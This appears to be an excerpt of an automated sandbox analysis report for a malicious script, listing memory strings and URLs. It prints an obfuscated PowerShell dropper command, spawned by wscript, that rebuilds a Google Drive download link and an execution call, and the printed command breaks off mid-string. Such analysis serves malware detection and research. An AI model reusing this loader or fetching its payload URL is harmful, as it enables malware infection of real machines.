Source: |
Binary string: re.pdbM source: powershell.exe, 00000002.00000002.1528482696.000001C5ECA79000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1530394780.000001C5ECC94000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: m.Core.pdbS source: powershell.exe, 00000002.00000002.1528482696.000001C5ECA79000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1530197727.000001C5ECC80000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Management.Automation.pdb4 source: powershell.exe, 00000002.00000002.1529537443.000001C5ECAC1000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1530394780.000001C5ECCEB000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: b.pdbpdblib.pdb source: powershell.exe, 00000002.00000002.1528482696.000001C5ECA79000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.1530394780.000001C5ECCEB000.00000004.00000020.00020000.00000000.sdmp |
Source: wscript.exe, 00000000.00000002.1374995986.0000013D6B198000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1372256990.0000013D6B125000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373234787.0000013D6B12F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373946365.0000013D6B198000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en |
Source: wscript.exe, 00000000.00000003.1364056176.0000013D6CFE0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1364907873.0000013D6CFE0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000000.00000002.1375982993.0000013D6D270000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab( |
Source: wscript.exe, 00000000.00000002.1374995986.0000013D6B198000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1372256990.0000013D6B125000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373234787.0000013D6B12F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373946365.0000013D6B198000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab.De |
Source: wscript.exe, 00000000.00000003.1365415710.0000013D6D2C5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5fe8a61cef167 |
Source: wscript.exe, 00000000.00000003.1363955829.0000013D6D29D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1365415710.0000013D6D2C5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?5fe8a61cef |
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DEE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.1520345452.000001C5901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.1485282092.000001C580001000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.1485282092.000001C580001000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000002.00000002.1485282092.000001C58046F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C5804F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581E49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DAF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP |
Source: powershell.exe, 00000002.00000002.1485282092.000001C5818BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbHP |
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C58048C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C58048C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbH&export=download |
Source: powershell.exe, 00000002.00000002.1485282092.000001C580227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.1485282092.000001C5812CB000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.1520345452.000001C5901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1520345452.000001C59006F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.1485282092.000001C58046F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C5804F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581E49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000002.00000002.1485282092.000001C58046F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C5804F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581E49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C580488000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000002.00000002.1485282092.000001C581DB3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ Kom |